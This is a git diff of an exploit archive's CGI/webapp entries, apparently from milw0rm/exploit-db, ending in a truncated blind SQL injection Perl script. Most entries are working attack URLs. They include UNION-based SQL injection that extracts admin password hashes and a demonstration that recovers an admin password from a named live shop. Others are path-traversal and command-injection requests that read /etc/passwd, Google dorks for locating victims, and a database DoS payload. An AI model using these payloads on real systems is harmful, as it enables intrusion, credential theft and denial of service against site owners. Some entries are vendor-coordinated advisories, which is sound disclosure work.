+ +Tested Versions + +Cybuzu Garoon 2 Version 2.1.0 for Windows + +Details + +This advisory discloses several SQL injection vulnerabilities in Cybozu Garoon 2. +1) TODO List View/Modify SQL Injection Cybuzu Garoon 2 does not properly sanitise the "tid" parameter +in the TODO List View and Modify functionality. It is possible for a logon user to exploit this vulnerability +to select values from arbitrary tables in the database. 
+ +When logon as a normal user: +TESTING NOTE a - In order for the examples to work, you must first logon as a user, then click on the TODO List link (icon) to go to the TODO List index page, before using the exploit. +TESTING NOTE b - Example 2 requires that at least 1 TODO List category has been created (category value 1). + + +Example 1: + +To retrieve the admin user's password hash via TODO List View. + +http://192.168.1.64/scripts/cbgrn/grn.exe/todo/view?tid=9999999)+union+select+1,null,col_foreign_key,col_password,2,null,0,null,null,null,null+from+tab_cb_user+where+_id=1/*&cid= + +Example 2: + +To retrieve the admin user's password hash via TODO List Modify. + +http://192.168.1.64/scripts/cbgrn/grn.exe/todo/modify?tid=9999999)+union+select+1,null,col_foreign_key,col_password,1,null,0,null,null,null,null+from+tab_cb_user+where+_id=1/*&cid= + + +2) Workflow View/Print SQL Injection + +Cybuzu Garoon 2 does not properly sanitise the "pid" parameter in the Workflow View and Print functionality. +It is possible for a logon user to exploit this vulnerability to select values from arbitrary tables in the database. + +Example 1: + +To retrieve the admin user's password hash via Workflow View. + +http://192.168.1.64/scripts/cbgrn/grn.exe/workflow/view?fid=9&pid=8888888+union+select+1,2,3,4,5,6,7,8,9,10,11,12,col_foreign_key,14,col_password,16,17,18,19,20,21,22+from+tab_cb_user where _id=1/* + +Example 2: + +To retrieve the admin user's password hash via Workflow Print. + +http://192.168.1.64/scripts/cbgrn/grn.exe/workflow/print?fid=9&pid=7777777+union+select+col_password,2,3,4,col_foreign_key,6,7,8,9,10,11,12,13,14,15,16,17,18+from+tab_cb_user where _id=1/* + +Note: In order for example 2 to work, "fid" must be a valid folder ID. + +3) Other SQL Injection Vulnerabilities + +Several other SQL injection vulnerabilities exists. These may e.g. be exploited to cause the MySQL-based Cybozu Database Engine to consume large amount of CPU resources, potentially causing a DoS. 
+ +SQL Injection: + +http://192.168.1.64/scripts/cbgrn/grn.exe/todo/index?cid=[SQL] +http://192.168.1.64/scripts/cbgrn/grn.exe/todo/delete?tid=[SQL] +http://192.168.1.64/scripts/cbgrn/grn.exe/schedule/user_view?uid=1[SQL] +http://192.168.1.64/scripts/cbgrn/grn.exe/phonemessage/add?gid=1&uid=1[SQL] +http://192.168.1.64/scripts/cbgrn/grn.exe/phonemessage/history?gid=1&uid=1[SQL] +http://192.168.1.64/scripts/cbgrn/grn.exe/memo/view?iid=1[SQL]&did= +http://192.168.1.64/scripts/cbgrn/grn.exe/memo/print?iid=1[SQL]&did= +http://192.168.1.64/scripts/cbgrn/grn.exe/schedule/view?event=1[SQL] +http://192.168.1.64/scripts/cbgrn/grn.exe/schedule/view?event=1&uid=1[SQL] + +Test Samples: + +http://192.168.1.64/scripts/cbgrn/grn.exe/todo/index?cid=' +http://192.168.1.64/scripts/cbgrn/grn.exe/todo/delete?tid=' +http://192.168.1.64/scripts/cbgrn/grn.exe/schedule/user_view?uid=1' +http://192.168.1.64/scripts/cbgrn/grn.exe/phonemessage/add?gid=1&uid=1' +http://192.168.1.64/scripts/cbgrn/grn.exe/phonemessage/history?gid=1&uid=1' +http://192.168.1.64/scripts/cbgrn/grn.exe/memo/view?iid=1'&did= +http://192.168.1.64/scripts/cbgrn/grn.exe/memo/print?iid=1'&did= +http://192.168.1.64/scripts/cbgrn/grn.exe/schedule/view?event=1' +http://192.168.1.64/scripts/cbgrn/grn.exe/schedule/view?event=1&uid=1' + +Example Exploit Against MySQL Backend: + +http://192.168.1.64/scripts/cbgrn/grn.exe/todo/index?cid=9999999)+ORDER+BY+_id,rand(benchmark(1000000000000,sha1(123456781234567812345678)))/* + +Patch / Workaround + +Update to version 2.1.1. + +References + +http://cybozu.co.jp/products/dl/notice_060825/ + +Disclosure Timeline + +2006-07-04 - Vulnerability Discovered. +2006-07-13 - Initial Vendor Notification. +2006-07-13 - Initial Vendor Reply. +2006-07-14 - Received scheduled patch release date from vendor. +2006-08-16 - Received notification that patch release will be delayed. +2006-08-25 - Vendor released patch information on website. +2006-08-28 - Public Disclosure. 
+ +Contact +For further enquries, comments, suggestions or bug reports, simply email them to +Tan Chew Keong (chewkeong[at]vuln[dot]sg) + +# milw0rm.com [2006-08-28] diff --git a/platforms/cgi/webapps/242.pl b/platforms/cgi/webapps/242.pl index 25a24206b..6fe1ecd2c 100755 --- a/platforms/cgi/webapps/242.pl +++ b/platforms/cgi/webapps/242.pl @@ -32,6 +32,6 @@ sysread($sock, $buffer, 100000); } } close $sock; - - -# milw0rm.com [2001-01-12] + + +# milw0rm.com [2001-01-12] diff --git a/platforms/cgi/webapps/289.pl b/platforms/cgi/webapps/289.pl index 44665e684..8a1e88474 100755 --- a/platforms/cgi/webapps/289.pl +++ b/platforms/cgi/webapps/289.pl @@ -53,6 +53,6 @@ push @DATA, $_; } my $woot = join(' ',@DATA); if($woot =~/$ARGV[1] wasn't found/) { print "$ARGV[1] dosnt seem to exist.\n"; exit 0; } -else { print "@DATA"; } - -# milw0rm.com [2001-03-04] +else { print "@DATA"; } + +# milw0rm.com [2001-03-04] diff --git a/platforms/cgi/webapps/3065.txt b/platforms/cgi/webapps/3065.txt index 41a2af5fb..d4d4137f4 100755 --- a/platforms/cgi/webapps/3065.txt +++ b/platforms/cgi/webapps/3065.txt @@ -1,17 +1,17 @@ - WWWBoard 2.0 Alpha 2 (passwd.txt) Password Disclosure Vulnerability - - - -Affected Software: WWWBoard 2.0 Alpha - -Download: http://www.scriptarchive.com/wwwboard.html - -Bugfounder: bd0rk - -Contact: bd0rk[at]hackermail.com - -Greetz: str0ke, Döner, TheJT, x0r_32 - -[+]Exploit: http://[target]/[www_board_path]/passwd.txt - -# milw0rm.com [2007-01-01] + WWWBoard 2.0 Alpha 2 (passwd.txt) Password Disclosure Vulnerability + + + +Affected Software: WWWBoard 2.0 Alpha + +Download: http://www.scriptarchive.com/wwwboard.html + +Bugfounder: bd0rk + +Contact: bd0rk[at]hackermail.com + +Greetz: str0ke, Döner, TheJT, x0r_32 + +[+]Exploit: http://[target]/[www_board_path]/passwd.txt + +# milw0rm.com [2007-01-01] diff --git a/platforms/cgi/webapps/3412.txt b/platforms/cgi/webapps/3412.txt index b17ee2947..941a20715 100755 --- a/platforms/cgi/webapps/3412.txt 
+++ b/platforms/cgi/webapps/3412.txt 
@@ -1,64 +1,64 @@ -I - TITLE - -Security advisory: Arbitrary file disclosure vulnerability in -rrdbrowse - -II - SUMMARY - -Description: Arbitrary file disclosure vulnerability in -rrdbrowse <= 1.6 - -Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com), -http://www.devtarget.org - -Date: March 4th, 2007 - -Severity: Medium - -References: http://www.devtarget.org/rrdbrowse-advisory-03-2007.txt - -III - OVERVIEW - -Quote from rrdbrowse.org: "RRDBrowse is a poller daemon, templater and -webinterface for RRDTool. It has a threaded daemon which periodically -runs from cron. It works with small .nfo files which hold router -information and optionally connection details, colors, min max, -bandwidth settings, etc, etc. RRDBrowse uses a small caching mechanism -to store interface names. It's much MRTG like in it's current state". -More information about the product can be found online at -http://www.rrdbrowse.org. - -IV - DETAILS - -Due to inproper input validation, the CGI application "rrdbrowse" -(versions <=1.6) is vulnerable to an arbitrary file disclosure -vulnerability. It allows an unauthenticated remote attacker to read any -file on the remote system if the user the webserver is running as has -permissions to do so. Thus an attacker is able to gain access -potentially sensitive information. - -V - EXPLOIT CODE - -The vulnerability is trivial to exploit and only requires specifying an -URL with a relative file path on the remote system such as - -http://$target/cgi-bin/rb.cgi?mode=page&file=../../../../../../../../etc/passwd - -As the input to the "file" parameter is not validated in any way -accessing this URL will expose the contents of /etc/passwd to a remote -attacker (interestingly except the first line). - -VI - WORKAROUND/FIX - -To address this problem, the author of rrdbrowse (Tommy van Leeuwen) has -released an updated CVS version (1.7) of the software which is available -at http://www.rrdbrowse.org. 
Hence all users of rrdbrowse are asked to -test and install this version as soon as possible. - -VII - DISCLOSURE TIMELINE - -06. February 2007 - Notified vendor -14. Feburary 2007 - Patch/new version released -04. March 2007 - Public disclosure - -# milw0rm.com [2007-03-04] +I - TITLE + +Security advisory: Arbitrary file disclosure vulnerability in +rrdbrowse + +II - SUMMARY + +Description: Arbitrary file disclosure vulnerability in +rrdbrowse <= 1.6 + +Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com), +http://www.devtarget.org + +Date: March 4th, 2007 + +Severity: Medium + +References: http://www.devtarget.org/rrdbrowse-advisory-03-2007.txt + +III - OVERVIEW + +Quote from rrdbrowse.org: "RRDBrowse is a poller daemon, templater and +webinterface for RRDTool. It has a threaded daemon which periodically +runs from cron. It works with small .nfo files which hold router +information and optionally connection details, colors, min max, +bandwidth settings, etc, etc. RRDBrowse uses a small caching mechanism +to store interface names. It's much MRTG like in it's current state". +More information about the product can be found online at +http://www.rrdbrowse.org. + +IV - DETAILS + +Due to inproper input validation, the CGI application "rrdbrowse" +(versions <=1.6) is vulnerable to an arbitrary file disclosure +vulnerability. It allows an unauthenticated remote attacker to read any +file on the remote system if the user the webserver is running as has +permissions to do so. Thus an attacker is able to gain access +potentially sensitive information. 
+ +V - EXPLOIT CODE + +The vulnerability is trivial to exploit and only requires specifying an +URL with a relative file path on the remote system such as + +http://$target/cgi-bin/rb.cgi?mode=page&file=../../../../../../../../etc/passwd + +As the input to the "file" parameter is not validated in any way +accessing this URL will expose the contents of /etc/passwd to a remote +attacker (interestingly except the first line). + +VI - WORKAROUND/FIX + +To address this problem, the author of rrdbrowse (Tommy van Leeuwen) has +released an updated CVS version (1.7) of the software which is available +at http://www.rrdbrowse.org. Hence all users of rrdbrowse are asked to +test and install this version as soon as possible. + +VII - DISCLOSURE TIMELINE + +06. February 2007 - Notified vendor +14. Feburary 2007 - Patch/new version released +04. March 2007 - Public disclosure + +# milw0rm.com [2007-03-04] diff --git a/platforms/cgi/webapps/4261.txt b/platforms/cgi/webapps/4261.txt index 9d1f6be36..693cd41ef 100755 --- a/platforms/cgi/webapps/4261.txt +++ b/platforms/cgi/webapps/4261.txt 
@@ -1,12 +1,12 @@ -################################################################################# -# YNP Portal System 2.2.0 (showpage.cgi p) Remote File Disclosure Vulnerability # -# D0RK : inurl:"showpage.cgi?p=popsearch.html" # -# : inurl:"showpage.cgi?p=support.html" # -# : inurl:"showpage.cgi?p=dialup.html" # -# : inurl:"showpage.cgi?p=" # -# POC: http://xxxx.com/showpage.cgi?p=../../../../../../etc/passwd # -# Discovered by: GolD_M = [Mahmood_ali] # -# Thanx To : Tryag-Team & Asbmay's Group & bd0rk & Cold Zero & All My Friends # -################################################################################# - -# milw0rm.com [2007-08-06] +################################################################################# +# YNP Portal System 2.2.0 (showpage.cgi p) Remote File Disclosure Vulnerability # +# D0RK : inurl:"showpage.cgi?p=popsearch.html" # +# : inurl:"showpage.cgi?p=support.html" # +# : inurl:"showpage.cgi?p=dialup.html" # +# : inurl:"showpage.cgi?p=" # +# POC: http://xxxx.com/showpage.cgi?p=../../../../../../etc/passwd # +# Discovered by: GolD_M = [Mahmood_ali] # +# Thanx To : Tryag-Team & Asbmay's Group & bd0rk & Cold Zero & All My Friends # +################################################################################# + +# milw0rm.com [2007-08-06] diff --git a/platforms/cgi/webapps/4264.txt b/platforms/cgi/webapps/4264.txt index 172b8c286..d7a218ef9 100755 --- a/platforms/cgi/webapps/4264.txt +++ b/platforms/cgi/webapps/4264.txt 
@@ -1,37 +1,37 @@ -author:meoconx[at]vnbrain.net -product:CartWeaver -main site:www.cartweaver.com -1.with CFM CartWeaver: -sql injection in: -Details.cfm?ProdID=a' - -demo: -http://www.jbracing.co.uk/Details.cfm?ProdID=1' -**************** -exploit: -http://www.xxx.com/Details.cfm?ProdID=[sql query] -**************** -link admin: -http://www.xxx.com/[script path]/cw2/admin/ -**************** -dork: -allinurl:Details.cfm ?ProdID= -allinurl:Results.cfm?category= -*************** -******************** -An example: -http://www.xxxxx.co.uk/Details.cfm?ProdID=1' -******************** -exploit it: --get username: -http://www.xxxxx.co.uk/Details.cfm?ProdID=1%20and%201=convert(int,(select%20top%201%20admin_username%20from%20tbl_adminusers)) -Conversion failed when converting the nvarchar value 'jim' to data type int. -==> the username is "jim" --get password: -http://www.xxxxx.co.uk/Details.cfm?ProdID=1%20and%201=convert(int,(select%20top%201%20char(97)%2badmin_password%20from%20tbl_adminusers)) -Conversion failed when converting the nvarchar value 'a518888' to data type int. The error occurred. on line 116. 
-==> the password is "51888"( because we added the "a" in the query to get the number that can be converted to integer value) --now, login into admin: -http://www.xxxxx.co.uk/cw2/admin/ - -# milw0rm.com [2007-08-06] +author:meoconx[at]vnbrain.net +product:CartWeaver +main site:www.cartweaver.com +1.with CFM CartWeaver: +sql injection in: +Details.cfm?ProdID=a' + +demo: +http://www.jbracing.co.uk/Details.cfm?ProdID=1' +**************** +exploit: +http://www.xxx.com/Details.cfm?ProdID=[sql query] +**************** +link admin: +http://www.xxx.com/[script path]/cw2/admin/ +**************** +dork: +allinurl:Details.cfm ?ProdID= +allinurl:Results.cfm?category= +*************** +******************** +An example: +http://www.xxxxx.co.uk/Details.cfm?ProdID=1' +******************** +exploit it: +-get username: +http://www.xxxxx.co.uk/Details.cfm?ProdID=1%20and%201=convert(int,(select%20top%201%20admin_username%20from%20tbl_adminusers)) +Conversion failed when converting the nvarchar value 'jim' to data type int. +==> the username is "jim" +-get password: +http://www.xxxxx.co.uk/Details.cfm?ProdID=1%20and%201=convert(int,(select%20top%201%20char(97)%2badmin_password%20from%20tbl_adminusers)) +Conversion failed when converting the nvarchar value 'a518888' to data type int. The error occurred. on line 116. +==> the password is "51888"( because we added the "a" in the query to get the number that can be converted to integer value) +-now, login into admin: +http://www.xxxxx.co.uk/cw2/admin/ + +# milw0rm.com [2007-08-06] diff --git a/platforms/cgi/webapps/4343.txt b/platforms/cgi/webapps/4343.txt index 737e7ccca..48ee4b996 100755 --- a/platforms/cgi/webapps/4343.txt +++ b/platforms/cgi/webapps/4343.txt 
@@ -1,15 +1,15 @@ -++++++++++++++++++++++++++++++++++++ -| Discovered by Breaker_unit & Don | -| Ourspace 2.0.9| -script info: http://www.codedworld.com/download/our-space/26931.html - -Exploit: /cgi-bin/ourspace/newswire/uploadmedia.cgi -dork: inurl:"/cgi-bin/ourspace/ - -Greetz to: -Balcan Crew Members -h4cky0u.org -and my friends: str0ke & kw3rLn -+++++++++++++++++++++++++++++++++++++++ - -# milw0rm.com [2007-08-30] +++++++++++++++++++++++++++++++++++++ +| Discovered by Breaker_unit & Don | +| Ourspace 2.0.9| +script info: http://www.codedworld.com/download/our-space/26931.html + +Exploit: /cgi-bin/ourspace/newswire/uploadmedia.cgi +dork: inurl:"/cgi-bin/ourspace/ + +Greetz to: +Balcan Crew Members +h4cky0u.org +and my friends: str0ke & kw3rLn ++++++++++++++++++++++++++++++++++++++++ + +# milw0rm.com [2007-08-30] diff --git a/platforms/cgi/webapps/4529.txt b/platforms/cgi/webapps/4529.txt index 75167d6f0..9a96e46ad 100755 --- a/platforms/cgi/webapps/4529.txt +++ b/platforms/cgi/webapps/4529.txt 
@@ -1,36 +1,36 @@ -# WWWISIS (Search) Multiple Vulnerabilities -# Download: -# http://bvsmodelo.bvsalud.org/php/level.php?lang=en&component=31&item=2 -# Bug found by JosS -# Contact: sys-project[at]hotmail.com -# Spanish Hackers Team -# www.spanish-hackers.com -# d0rk: powered by WWWISIS -#Stop lammer - - -# Local File Disclosure Vulnerability: - -http://server/cgi-bin/wxis.exe/iah/?IsisScript=[file] -http://server/cgi-bin/wxis.exe/iah/?IsisScript=../../../../../../../../../etc/passwd - - -# Exploit In (XSS): - -http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base=article%5Edlibrary&fmt=iso.pft&lang=i -http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base=article%5Edlibrary&fmt=iso.pft&lang=e -.... - -[ i,e ... ] it is the language of script - -# Cross Siting Scripting: - - - - -//---------------------------------------\\ - -Greetz To: All Hackers -JosS! - -# milw0rm.com [2007-10-13] +# WWWISIS (Search) Multiple Vulnerabilities +# Download: +# http://bvsmodelo.bvsalud.org/php/level.php?lang=en&component=31&item=2 +# Bug found by JosS +# Contact: sys-project[at]hotmail.com +# Spanish Hackers Team +# www.spanish-hackers.com +# d0rk: powered by WWWISIS +#Stop lammer + + +# Local File Disclosure Vulnerability: + +http://server/cgi-bin/wxis.exe/iah/?IsisScript=[file] +http://server/cgi-bin/wxis.exe/iah/?IsisScript=../../../../../../../../../etc/passwd + + +# Exploit In (XSS): + +http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base=article%5Edlibrary&fmt=iso.pft&lang=i +http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base=article%5Edlibrary&fmt=iso.pft&lang=e +.... + +[ i,e ... ] it is the language of script + +# Cross Siting Scripting: + + + + +//---------------------------------------\\ + +Greetz To: All Hackers +JosS! + +# milw0rm.com [2007-10-13] diff --git a/platforms/cgi/webapps/464.txt b/platforms/cgi/webapps/464.txt index b957bc743..264f7187d 100755 --- a/platforms/cgi/webapps/464.txt +++ b/platforms/cgi/webapps/464.txt 
@@ -2,6 +2,6 @@ Some demonstration exploit URLs are provided: /cgi-bin/cgi/tseekdir.cgi?location=/etc/passwd%00 /cgi-bin /tseekdir.cgi?id=799&location=/etc/passwd%00 - - -# milw0rm.com [2004-09-13] + + +# milw0rm.com [2004-09-13] diff --git a/platforms/cgi/webapps/4647.txt b/platforms/cgi/webapps/4647.txt index 95892e035..8d84aa90e 100755 --- a/platforms/cgi/webapps/4647.txt +++ b/platforms/cgi/webapps/4647.txt @@ -1,11 +1,11 @@ -"KB-Bestellsystem" is a domain order system written in Perl. -The "domain" and "tld" parameters in "kb_whois.cgi" are not filtering shell metacharacters. - -The following examples will show you the /etc/passwd file: - -http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=;cat%20/etc/passwd;&tld=.com&tarrif= -http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=google&tld=.com;cat /etc/passwd;&tarrif= - -<< Greetz Zero X >> - -# milw0rm.com [2007-11-22] +"KB-Bestellsystem" is a domain order system written in Perl. +The "domain" and "tld" parameters in "kb_whois.cgi" are not filtering shell metacharacters. + +The following examples will show you the /etc/passwd file: + +http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=;cat%20/etc/passwd;&tld=.com&tarrif= +http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=google&tld=.com;cat /etc/passwd;&tarrif= + +<< Greetz Zero X >> + +# milw0rm.com [2007-11-22] diff --git a/platforms/cgi/webapps/4977.txt b/platforms/cgi/webapps/4977.txt index 2ea7528a0..724bc3ef3 100755 --- a/platforms/cgi/webapps/4977.txt +++ b/platforms/cgi/webapps/4977.txt 
@@ -1,48 +1,48 @@ -Application: aconon(R) Mail - -Affected versions: probably all known, tested against 2007 Enterprise -SQL 11.7.0 and 2004 Enterprise SQL 11.5.1 - -Affected plattforms: every, Aconon runs at (Win32, Linux, Solaris ...) - -Exploitation: remote - -Description: Aconon Mail is a commercial newsletter software, providing -a feature rich web interface for both, users and administrators. This -includes a public available archive of sent newsletters. Those archived -e-mails may be accessed through the web browser, processed by a template - engine. The used template may be overwritten by any user, modifying the -HTTP-GET "template" form parameter. This parameter is checked against -code injection, not against directory traversal though. - -Proof of Concept: - -http://www.aconon.de/mail-demo/archiv.cgi?list=&file=Newsletter-HtmlNachricht.save&template=data/password.pl&link=%3C%3C%3C%3C -vhttp://www.aconon.de/mail-demo/archiv.cgi?list=&file=Newsletter-HtmlNachricht.save&template=../../../../../../etc/passwd&link=%3C%3C%3C%3C - -Fix: - -No fix has been published yet. However this workaround should patch the -issue: - -Add in archiv.cgi below - $FORM{'template'} =~ s/\|//g; - -this code: - - use File::Basename; - $FORM{'template'} = ($FORM{'template'}) ? basename($FORM{'template'}) -: ""; - if ($FORM{'template'} && $FORM{'template'} !~ /\.html$/) { - &error ("$TXT{'1501'}"); - } - -Status: the vendor has been informed. - - -German readers of the list may also read -http://burnachurch.com/67/directory-traversal-luecke-in-aconon-mail/ - -P.S. greets to missi - you're great :o) - -# milw0rm.com [2008-01-23] +Application: aconon(R) Mail + +Affected versions: probably all known, tested against 2007 Enterprise +SQL 11.7.0 and 2004 Enterprise SQL 11.5.1 + +Affected plattforms: every, Aconon runs at (Win32, Linux, Solaris ...) 
+ +Exploitation: remote + +Description: Aconon Mail is a commercial newsletter software, providing +a feature rich web interface for both, users and administrators. This +includes a public available archive of sent newsletters. Those archived +e-mails may be accessed through the web browser, processed by a template + engine. The used template may be overwritten by any user, modifying the +HTTP-GET "template" form parameter. This parameter is checked against +code injection, not against directory traversal though. + +Proof of Concept: + +http://www.aconon.de/mail-demo/archiv.cgi?list=&file=Newsletter-HtmlNachricht.save&template=data/password.pl&link=%3C%3C%3C%3C +vhttp://www.aconon.de/mail-demo/archiv.cgi?list=&file=Newsletter-HtmlNachricht.save&template=../../../../../../etc/passwd&link=%3C%3C%3C%3C + +Fix: + +No fix has been published yet. However this workaround should patch the +issue: + +Add in archiv.cgi below + $FORM{'template'} =~ s/\|//g; + +this code: + + use File::Basename; + $FORM{'template'} = ($FORM{'template'}) ? basename($FORM{'template'}) +: ""; + if ($FORM{'template'} && $FORM{'template'} !~ /\.html$/) { + &error ("$TXT{'1501'}"); + } + +Status: the vendor has been informed. + + +German readers of the list may also read +http://burnachurch.com/67/directory-traversal-luecke-in-aconon-mail/ + +P.S. greets to missi - you're great :o) + +# milw0rm.com [2008-01-23] diff --git a/platforms/cgi/webapps/53.c b/platforms/cgi/webapps/53.c index 2bc89425d..f604d5fd6 100755 --- a/platforms/cgi/webapps/53.c +++ b/platforms/cgi/webapps/53.c @@ -176,6 +176,6 @@ done: return (-1); return (fd); -} - -// milw0rm.com [2003-07-10] +} + +// milw0rm.com [2003-07-10] diff --git a/platforms/cgi/webapps/5304.txt b/platforms/cgi/webapps/5304.txt index 6c979a513..20aeeb6f9 100755 --- a/platforms/cgi/webapps/5304.txt +++ b/platforms/cgi/webapps/5304.txt 
@@ -1,9 +1,9 @@
-HIS-Webshop is a shopping-system written in Perl by www.shoppark.de
-The script doesn´t check the "t"-parameter.
-
-Example:
-http://server.com/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/passwd%00
-
-<< Greetz Zero X >>
-
-# milw0rm.com [2008-03-24]
+HIS-Webshop is a shopping-system written in Perl by www.shoppark.de
+The script doesn´t check the "t"-parameter.
+
+Example:
+http://server.com/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/passwd%00
+
+<< Greetz Zero X >>
+
+# milw0rm.com [2008-03-24]
diff --git a/platforms/cgi/webapps/5662.txt b/platforms/cgi/webapps/5662.txt
index 96ae3fcaf..a93f75993 100755
--- a/platforms/cgi/webapps/5662.txt
+++ b/platforms/cgi/webapps/5662.txt
@@ -1,90 +1,90 @@ -Digital Security Research Group [DSecRG] Advisory #DSECRG-08-020 - - -Application: Alcatel OmniPCX Office -Versions Affected: Alcatel OmniPCX Office since release 210/061.1 -Vendor URL: http://alcatel.com -Bugs: Remote command execution -Exploits: YES -Risk: High -CVSS Score: 7.31 -CVE-number: 2008-1331 -Reported: 31.01.2008 -Vendor response: 01.02.2008 -Customers informed: 07.03.2008 -Published on PSIRT: 01.04.2008 -Date of Public Advisory: 21.05.2008 -Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) - - - -Introduction -************ - -The OmniPCX Enterprise is an integrated communications solution for -medium-sized businesses and large corporations. It combines the best of -the old (legacy TDM phone connectivity) with the new (a native IP -platform and support for Session Initiation Protocol, or SIP) to provide -an effective and complete communications solution for cost-conscious -companies on the cutting edge. - -(from the vendor's homepage) - - -Description -*********** - -Alcatel OmniPCX Office Web Interface has critical security vulnerability Remote command execution - -The risk of this vulnerability is high. Any user which has access to the -web interface of the OmniPCX Enterprise solution will be able to execute -arbitrary commands on the server with the permissions of the webserver. - - -Details -******* - - -Remote command execution vulnerability found in script /cgi-data/FastJSData.cgi in parameter name id2 -Variable id2 not being filtered when passed to the shell. Thus, arbitrary commands can be executed on -the server by adding them to the user variable, separated by semicolons. 
- -You can find more details on this advisory on vendors website http://www1.alcatel-lucent.com/psirt/statements.htm -under reference 2008001 - - - -Example: - - -http://[server]/cgi-data/FastJSData.cgi?id1=sh2kerr&id2=91|cat%20/etc/passwd - - - - -Fix Information -*************** - -Alcatel was altered to fix this flaw on 01.04.2008. Updated version can be downloaded here: - -http://www1.alcatel-lucent.com/enterprise/en/products/ip_telephony/omnipcxenterprise/index.html - - - - - - -About -***** - -Digital Security is leading IT security company in Russia, providing information security consulting, -audit and penetration testing services, risk analysis and ISMS-related services and certification for -ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application -and database security problems with vulnerability reports, advisories and whitepapers posted regularly -on our website. - - -Contact: research [at] dsec [dot] ru - http://www.dsec.ru (in Russian) - -# milw0rm.com [2008-05-21] +Digital Security Research Group [DSecRG] Advisory #DSECRG-08-020 + + +Application: Alcatel OmniPCX Office +Versions Affected: Alcatel OmniPCX Office since release 210/061.1 +Vendor URL: http://alcatel.com +Bugs: Remote command execution +Exploits: YES +Risk: High +CVSS Score: 7.31 +CVE-number: 2008-1331 +Reported: 31.01.2008 +Vendor response: 01.02.2008 +Customers informed: 07.03.2008 +Published on PSIRT: 01.04.2008 +Date of Public Advisory: 21.05.2008 +Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) + + + +Introduction +************ + +The OmniPCX Enterprise is an integrated communications solution for +medium-sized businesses and large corporations. It combines the best of +the old (legacy TDM phone connectivity) with the new (a native IP +platform and support for Session Initiation Protocol, or SIP) to provide +an effective and complete communications solution for cost-conscious +companies on the cutting edge. 
+ +(from the vendor's homepage) + + +Description +*********** + +Alcatel OmniPCX Office Web Interface has critical security vulnerability Remote command execution + +The risk of this vulnerability is high. Any user which has access to the +web interface of the OmniPCX Enterprise solution will be able to execute +arbitrary commands on the server with the permissions of the webserver. + + +Details +******* + + +Remote command execution vulnerability found in script /cgi-data/FastJSData.cgi in parameter name id2 +Variable id2 not being filtered when passed to the shell. Thus, arbitrary commands can be executed on +the server by adding them to the user variable, separated by semicolons. + +You can find more details on this advisory on vendors website http://www1.alcatel-lucent.com/psirt/statements.htm +under reference 2008001 + + + +Example: + + +http://[server]/cgi-data/FastJSData.cgi?id1=sh2kerr&id2=91|cat%20/etc/passwd + + + + +Fix Information +*************** + +Alcatel was altered to fix this flaw on 01.04.2008. Updated version can be downloaded here: + +http://www1.alcatel-lucent.com/enterprise/en/products/ip_telephony/omnipcxenterprise/index.html + + + + + + +About +***** + +Digital Security is leading IT security company in Russia, providing information security consulting, +audit and penetration testing services, risk analysis and ISMS-related services and certification for +ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application +and database security problems with vulnerability reports, advisories and whitepapers posted regularly +on our website. + + +Contact: research [at] dsec [dot] ru + http://www.dsec.ru (in Russian) + +# milw0rm.com [2008-05-21] diff --git a/platforms/cgi/webapps/6108.pl b/platforms/cgi/webapps/6108.pl index 61e07d2e6..886e31dc3 100755 --- a/platforms/cgi/webapps/6108.pl +++ b/platforms/cgi/webapps/6108.pl 
@@ -1,96 +1,96 @@ -#!/usr/bin/perl -use LWP::UserAgent; -use Getopt::Long; -if(!$ARGV[1]) -{ - print " \n"; - print " #################### Viva IslaMe Viva IslaMe ################\n"; - print " # MojoClassifieds Blind SQL Injection Exploit #\n"; - print " # (mojoClassified.cgi mojo ) #\n"; - print " # Author: Mr.SQL #\n"; - print " # EMAIL : SQL@HOTMAIL.IT #\n"; - print " # #\n"; - print " # -((:: GrE3E3E3E3E3ETZ ::))- #\n"; - print " # #\n"; - print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #\n"; - print " # :: ALwHeD :: milw0rm :: #\n"; - print " # #\n"; - print " # <<>> MuSliMs HaCkErS <<>> #\n"; - print " # #\n"; - print " # HOME: WwW.PaL-HaCkEr.CoM #\n"; - print " # #\n"; - print " # Usage : perl test.pl host #\n"; - print " # Example: perl test.pl www.host.com / -d 10 #\n"; - print " # Options: #\n"; - print " # -d valid cat_a value #\n"; - print " #############################################################\n"; - exit; -} -my $host = $ARGV[0]; -my $cat_a = $ARGV[2]; -my %options = (); -GetOptions(\%options, "u=i", "p=s", "d=i"); -print "[~] Exploiting...\n"; -if($options{"b"}) -{ - $mojo = $options{"b"}; -} -syswrite(STDOUT, "[~] MD5-Hash: ", 14); -for(my $i = 1; $i <= 32; $i++) -{ - my $f = 0; - my $h = 48; - while(!$f && $h <= 57) - { - if(istrue2($host, $cat_a, $i, $h)) - { - $f = 1; - syswrite(STDOUT, chr($h), 1); - } - $h++; - } - if(!$f) - { - $h = 97; - while(!$f && $h <= 122) - { - if(istrue2($host, $cat_a, $i, $h)) - { - $f = 1; - syswrite(STDOUT, chr($h), 1); - } - $h++; - } - } -} -print "\n[~] Exploiting done\n"; -sub istrue2 -{ - my $host = shift; - my $cat_a = shift; - my $i = shift; - my $h = shift; - - my $ua = LWP::UserAgent->new; - my $query = "http://".$host."mojoClassified.cgi?mojo=1&cat_a=".$cat_a." 
